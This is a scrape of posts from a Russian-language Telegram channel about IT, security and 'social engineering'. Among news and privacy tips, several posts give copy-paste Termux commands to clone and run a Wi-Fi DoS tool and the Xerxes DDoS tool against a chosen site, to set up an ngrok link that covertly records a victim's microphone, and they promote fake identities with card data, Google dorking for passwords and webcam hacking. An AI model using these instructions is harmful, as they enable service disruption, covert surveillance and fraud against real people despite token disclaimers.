CMD | IT
25.6K subscribers
2.41K photos
596 videos
10 files
3.88K links
Новости IT, Безопасность в сети, Социальная инженерия.

Ссылка: @Portal_v_IT

Сотрудничество: @oleginc, @tatiana_inc

Купить рекламу: telega.in/c/cmd_it

РКН: clck.ru/3Jb78b
Download Telegram
Как создать невидимую защищенную паролем папку

Привет ребят,я уверен каждый из вас терял свой гаджет и переживал за потерянную в нем информацию.
Так вот,вернемся к истокам и вспомним,как поставить пароль на свою папку и сделать ее максимально защищенной.
Очень просто,но довольно надежно,

|Читать статью|
This media is not supported in your browser
VIEW IN TELEGRAM
Автоматическая установка хакерских инструментов

Привет ребят,я стал частенько выкладывать скрипты и утили для Termux.Публикую только самые интересные и легкие в установке.
Некоторые из них работают в связке с другими.Поэтому держите инструмент,который позволяет установить или держать у себя под рукой 20 полезных утилит!

Устанавливаем Termux

Прописываем команды в консоль:

📌pkg update
📌pkg upgrate
📌apt-get install git
📌apt-get install python
📌git clone https://github.com/AnonHackerr/toolss
📌cd toolss
📌chmod +x Toolss.py
📌python Toolss.py

Все.Вам открылась Hack панель и теперь вы можете установить любую интересующую вас утилиту.Для установки всех сразу введите-00
Чуточку подробней
Что будет с вашими виртуальными аккаунтами, когда вы умрете?

Никто не любит думать о смерти. И уж тем более мало кого заботит, что станет с нашими профилями на различных сайтах, когда мы отправимся в мир иной. Однако подумать об этом стоило бы. Одна из особенностей интернета заключается в том, что он заботливо сохраняет всю информацию, которой мы с ним делимся.

|Читать статью|
This media is not supported in your browser
VIEW IN TELEGRAM
Самая анонимная поисковая система

В интернете нельзя и шагу ступить незамеченным.К примеру,с целью продавать маркетологам информацию о пользователях,поисковики анализируют все наши запросы.Однако существует выход.Вы можете воспользоваться поисковой системой DuckDuckGo,которая,не следит за своими пользователями.Она не хранит лог-файлы и IP-адреса, а также по дефолту не использует куки.Безопасность персональных данных обеспечивается благодаря использованию алгоритма шифрования AES и ключа длиной 128 бит.

В DuckDuckGo практически отсутствует спам,которым забиты все коммерческие поисковики.Cейчас результаты поиска удивляют своей чистотой и точностью.Результаты поиска DuckDuckGo агрегируются из пятидесяти разных источников, включая Wikipedia,Wolfram Alpha и собственного поискового робота,что позволяет поисковику выдавать намного больше результатов поиска.

Одним словом,DuckDuckGo — своеобразная оппозиция Google и всем коммерческим поисковикам в целом,которая просто не могла рано или поздно не появиться.
Самые удивительные трюки в блокноте,которые вы должны попробовать

Можно буквально уничтожить чей-то компьютер с помощью блокнота, а также решить большие проблемы с помощью блокнота. Хорошо, блокнот не делает все, что я сказал сам по себе, но все же. Это платформа, на которой можно написать исходный код, который затем можно скомпилировать и прочее.Я подготовил для вас 15 простых скриптов,которые поднимут вам и вашим друзьям настроение.

|Читать статью|
This media is not supported in your browser
VIEW IN TELEGRAM
Убиваем Wi-FI

Привет ребят,уверен у вас была ситуация,когда нужно было обрубить wi-fi
Данный инструмент поможет нам сделать так,чтобы роутер либо тормозил либо вовсе не раздавал интернет.
Можете протестировать на своем собственном.Чтобы все работало нужно подключиться сначала к wi-fi сети,которую вы хотите ''положить''.
Не злоупотребляйте!

Устанавливаем Termux

Прописываем команды в консоль:

📌pkg upgrade
📌pkg install python python2 git
📌cd
📌git clone https://github.com/artem-cell/wifi-dosser
📌cd wifi-dosser
📌pip2 install requests mechanize
📌ls
📌python2 wifi-ddoser.py
📌python2 wifi-ddoser.py example.com 80 3 999999999999

Если что,после портов в последний строчке-это время в секундах.Указывайте столько,сколько вам нужно чтобы положить роутер.
Если тестируете на своем собственном роутере,то чтобы остановить ddos,просто перезагрузите его.
Кто вам сказал,что VPN дает вам анонимность!?

На любом "темном" форуме есть не менее десятка тем с обсуждением VPN сервисов. И что характерно ни в одной из них не обсуждается вопрос - а дают ли VPN какую то анонимность?В этой статье мы постараемся это выяснить.

|Читать статью|
​​Я создаю чат канала!

Привет ребят,много кто просил сделать чат,чтобы вы могли общаться и обсуждать посты публикуемые на канале.Но в перую очередь чат создан для того чтобы вы могли помогать друг другу.Я просто не успею всем отвечать или разбирать ваши проблемы.Общайтесь,обсуждайте,помогайте друг другу!

Кстати,возможно с течением времени чат канет в лету.Так что успей добавиться!
Заражение компьютера с помощью GIF

Для того, чтобы вирус, полученный каким-либо образом, смог заразить систему, его программный код должен быть исполнен.Сам себя вирус запустить не может, поэтому, например, обычное копирование зараженного файла в незараженную систему еще не приводит к заражению.Сегодня мы поговорим о
заражение компьютера через GIF изображение и получения доступа к нему.

|Читать статью|
This media is not supported in your browser
VIEW IN TELEGRAM
Cоздаем фейковую личность

Приветствую друзья,думаю многие из вас работали на фриланс биржах или может быть кто-то занимался перепродажей вещей на ebay.
В общем все сталкивались с ситуацией,когда при работе с каким-то сайтом нужно кроме почты,логина и пароля ввести дополнительные данные,а именно:
кредитную карту,место занятости,возможно даже полис,номера отслеживания и тд.Для быстрого создания этих данных нам поможет fakenamegenerator

Буквально несколькими кликами мыши этот ресурс создаст для вас реальную личность,снабдив при этом всеми положенными атрибутами – именем,фамилией, профессией,родственниками,банковской картой,группой крови,машиной и тд.).Кстати,электронный ящик вы получите самый настоящий.Вам лишь останется активировать его. Сделать это можно будет тут же,в FakeNameGenerator.Дополнительно вам будут предоставлены виртуальные день рождения,вес,рост,данные геолокации (место проживания), идентификатор UPS и многие другие сведения.
👍1🔥1
Используем малоизвестные функции Google,чтобы найти пароли и скрытые файлы

Получение частных данных не всегда означает взлом — иногда они опубликованы в общем доступе. Знание настроек Google и немного смекалки позволят найти массу интересного — от номеров кредиток до документов ФБР.

|Читать статью|
This media is not supported in your browser
VIEW IN TELEGRAM
Ставим прослушку на телефон

Привет ребят,сегодня покажу как установить самую легкую прослушку на телефон.Конечно нужно будет применить свои навыки СИ для получения результата.
После проделанных манипуляций вам будет выдана ссылка.После перехода по ней человеку нужно будет дать разрешение на исп. микрофона.Хочу подметить,что вы должны осознавать кому кидаете эту ссылку.Друзьям можно,но не более,тк такие действия наказуемые!

Для генерации ссылки обязательно отключите wifi(юзайте сотовую сеть) и включите точку доступа

Устанавливаем Termux

Прописываем команды в консоль:
Команд чуть больше чем обычно поэтому они тут(клик)

После того как вы ввели все указанные команды у вас открылась "SayHello"
Выбираем в ней Ngrok-02
Спустя пару секунд сгенерируется нужная нам ссылка.Вот и все.
Для прослушки собранных аудио прописываем(клик)
1
This media is not supported in your browser
VIEW IN TELEGRAM
Узнаем полезность софта

Привет ребят,все мы постоянно обновляем свой арсенал новыми программами и софтом,но многие попросту прочитав обзор на приглянувшийся софт сразу же бегут его скачивать.По сути в этом нет ничего страшного,но я уверен,что вам хотелось бы знать
намного больше информация,вплоть до показателя за действия cpu.

В этом вам поможет shouldiremoveit.Здесь вы увидите полный обзор программы, устанавливаемые к ней файлы,географию распространения,на каких ОС программа скачиваеться,соотношение скачивания и удаления,а также вы можете посмотреть оценку пользователей и много другое.В общем от А до Я.Если вы предпочитаете проводить полный анализ скаченных вами программ или софта,то данный сайт вам точно пригодиться.
Смотри во все глаза. Как взламывают IP- и веб-камеры и как от этого защититься

Удаленный доступ к веб-камерам и камерам наблюдения — самая наглядная практика взлома. Она не требует спецсофта, позволяя обойтись только браузером и нехитрыми манипуляциями. Тысячи цифровых глаз по всему миру станут доступны, если ты умеешь находить их IP-адреса и уязвимости.

|Читать статью|
​​В России поймали международную банду хакеров

ФСБ в сотрудничестве со следственным отделом МВД России нейтрализовала деятельность организованной преступной группировки,специализирующейся на финансовых мошенничествах,кражах и других незаконных операциях в сети.Хакеры занимались продажей украденных данных кредитных карт на специально созданных сайтах.

Для достижения своих целей члены группы создали более 90 интернет-магазинов, продающих полученные данные.Таким образом,хакеры получали информацию,которую затем использовали для кражи средств с банковских счетов граждан разных стран.

Во время обыска в штаб-квартире группы сотрудники обнаружили более миллиона долларов,3 миллиона рублей,компьютерное оборудование,в том числе серверы, обслуживающие нелегальные сайты.Оружие,наркотики,золотые слитки,ценные монеты,а также поддельные документы.На данный момент преступники находятся под стражей и ожидают суда.
This media is not supported in your browser
VIEW IN TELEGRAM
Проводим DDOS атаку на сайт

Привет ребят,в общем хочу показать как устроить атаку на сайт через termux.Конечно вы сами должны понимать,что ddos именно через termux
возможен только для слабеньких сайтов.Также если у вас имеется свой собственный ресурс вы можете проверить,как такая атака отразиться на его работоспособности.Поехали!

Устанавливаем Termux

Прописываем команды в консоль:
📌pkg install update
📌pkg install upgrade
📌pkg install git
соглашаетесь продолжить-Y
📌git clone https://github.com/sepehrdaddev/Xerxes
📌pkg install clang
cоглашаетесь продолжить-Y
📌cd xerxes
📌gcc xerxes.c -o x
📌./x www.(сайт) 80
пишите только url cайта,как пример: ./x www.youtubr.com 80

Все.Запущена отправка пакетов.Для лучшего эффекта запускайте новые сессии и вводите:
📌ls
📌cd xerxes
📌./x www.(cайт) 80
Как используя смартфон остаться анонимным?

Хранение личной информации на серверах стало нормой; мир заполнился мобильными девайсами с GPS-приемниками и GSM-модулями, способными рассказать практически все об их владельцах; правительства стран все больше вторгаются в нашу личную жизнь и контролирует каждое наше слово.

|Читать статью|
This media is not supported in your browser
VIEW IN TELEGRAM
Ищем человека по никнейму

Есть люди,которые с самого начала своего пути во всемирной паутине при регистрации различных аккаунтов используют один и тот же никнейм.
Кто-то хочет себя ассоциировать с придуманным интернет именем,а кому-то просто лень придумывать новый никнейм.Если же нужно найти информацию о человеке и вы знаете о его пристрастие к созданию одного и того же ника,то сервис whatsmyname.app поможет вам в этом

Whatsmyname-эффективный и полностью бесплатный инструмент для поиска имени пользователя и домена среди массы проектов в сети Интернет.а также, сервис прекрасно подходит для поиска бизнес-проектов и публичных персон,которым необходимо иметь уникальное наименование в большинстве значимых и популярных сетях и,тем самым,поддерживать свой имидж.
10 лучших расширений браузеров для хакеров и OSINT-специалистов

Современные браузеры являются надежными инструментами с большими функциональными возможностями, но их можно дополнительно улучшать с помощью расширений. Это позволит нам делать некоторые весьма впечатляющие вещи.

|Читать статью|
​​5 старых операционок,которые можно попробовать прямо в браузере

Предлагаю этим вечером не просто вспомнить, как выглядели старые операционки и что они умели. Просто запустим их в браузере – «без костылей».Рассказываю, как получить мощную инъекцию ностальгии по Windows 95, познать чудо AmigaOS и ужаснуться «яблочной» Классике. Поехали.

1. Windows 3.1
Весной 1992 года компания Microsoft выпустила Windows 3.1. Система работала на базе MS-DOS и запускалась из командной строки, как обычная «досовская программа». По этой причине есть те, кто не признает Windows 3.1 операционкой, а считает ее просто графической средой к MS-DOS.

2.Windows 95
В Windows 95 впервые появились меню «Пуск» и «Панель задач», которые стали неотъемлемыми компонентами всех последующих версий Windows.

3.System 7
Более известна как «Классика». Выходила с 1991 года для Macintosh на процессорах Motorola 68k, а позже, начиная с версии 7.1.2, добавилась поддержка PowerPC

4.PC-DOS 5
В 1981 году компания Microsoft купила операционную систему 86-DOS. Ее планировалось доработать и использовать на компьютерах IBM PC.

5.AmigaOS 1.3
В 1987 году на полках британских магазинов появился домашний компьютер Commodore Amiga 500. Железо было почти такое же, как и у Macintosh 512Ke — 16-битный процессор Motorola 68000 с тактовой частотой 7,8 МГц и 512 Кб оперативной памяти, которую можно было расширить до 16 Мб.
👍1
Все про Wanna Cry.Вирус,который застал людей врасплох

12 мая началась эпидемия трояна-шифровальщика WannaCry — похоже, происходит это по всему миру. Эпидемией мы это называем потому, что очень уж велики масштабы. За один только день мы насчитали более 45 000 случаев атаки, но на самом деле их наверняка намного больше.

|Читать статью|